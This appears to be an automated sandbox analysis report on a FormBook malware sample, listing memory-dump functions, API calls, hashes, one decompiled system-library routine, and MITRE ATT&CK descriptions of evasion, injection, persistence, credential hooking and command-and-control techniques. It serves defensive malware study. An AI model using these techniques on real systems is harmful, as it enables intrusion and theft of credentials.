Uniqueness Score: -1.00%

Function 00F7A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00F74506,?,00F74C7F,00F74C7F,?,00F74506,?,?,?,?,?,00000000,00000000,?), ref: 00F7A05D

Memory Dump Source

Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 44ad86f76cc4cc6402dd678a135ae73ac218f37fe6f499a00bcd927ab0d30253
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 18E01AB1200208ABD714DF59CC41EA777ADEF88650F118559BA085B241C530F9108AB1

Uniqueness

Uniqueness Score: -1.00%

Function 00F7A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,00F6F1A2,00F6F1A2,?,00000000,?,?), ref: 00F7A200

Memory Dump Source

Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 16b5e9bcf817b8f9fb6c70130540496054a13899399a42b54c6a885984b8d20d
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: CDE01AB12002086BDB10DF49CC85EEB37ADEF88650F018155BA0C67241C934E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00F6F697, Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,00F68CF4,?), ref: 00F6F6CB

Memory Dump Source

Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: e253f9d631215993c84dec7722cd7f53efe2cab4a5defbadf7eab7c24dcdace0
Instruction ID: 0bb4420a46357b2b15625a20f84e86c61cb4dd9ace1331141602dc65f79dea93
Opcode Fuzzy Hash: e253f9d631215993c84dec7722cd7f53efe2cab4a5defbadf7eab7c24dcdace0
Instruction Fuzzy Hash: 1FE02BB199420039FA207F706C03B473B484710720F194069E9A8BB283DA05D1055630

Uniqueness

Uniqueness Score: -1.00%

Function 00F6F6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,00F68CF4,?), ref: 00F6F6CB

Memory Dump Source

Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction ID: e02fd44302daf80cb44f9e90d9143fbfb7a4e440d618894a7e5a15c8a5d21f27
Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction Fuzzy Hash: 32D05E616903043AE610AAA49C03F2632896B44B10F494064FA48962C3D954E4004165

Uniqueness

Uniqueness Score: -1.00%

Function 04FD967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FD9694

Memory Dump Source

Source File: 0000000F.00000002.504196536.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true

Associated: 0000000F.00000002.505096584.000000000508B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d9b43f7225f102851f5f17dbf315b690ea6f7628100e0c51d2f85c92bf27cdb3
Instruction ID: 2122a3a5c0b7131ab5e42ed079cb9a3a5bb101beddd0114d4c40b608cf8c4d00
Opcode Fuzzy Hash: d9b43f7225f102851f5f17dbf315b690ea6f7628100e0c51d2f85c92bf27cdb3
Instruction Fuzzy Hash: 9EB09BB1D414C5C5F711D7B54E08B37790177D0745F16C051D1021685A4778D492F6B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0502FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0502FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04FDCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E05025720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E05025720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0502fdda
0x0502fde2
0x0502fde5
0x0502fdec
0x0502fdfa
0x0502fdff
0x0502fe0a
0x0502fe0f
0x0502fe17
0x0502fe1e
0x0502fe19
0x0502fe19
0x0502fe19
0x0502fe20
0x0502fe21
0x0502fe22
0x0502fe25
0x0502fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0502FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0502FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0502FE01

Memory Dump Source

Source File: 0000000F.00000002.504196536.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true

Associated: 0000000F.00000002.505096584.000000000508B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: efd9e37d9e495a807bd453870d49073d990410387ddd479653a64c5135c3f5f1
Instruction ID: aa87f40852e598dbc3a6cb66e37b3f496e878f85fb6673de3aebad160212af71
Opcode Fuzzy Hash: efd9e37d9e495a807bd453870d49073d990410387ddd479653a64c5135c3f5f1
Instruction Fuzzy Hash: 5EF0F672240211BFEB212A45EC06F77BB6AEB44770F150314FA285A1D1DA62FC2096F4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report gzU8odwaPalRTGB.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre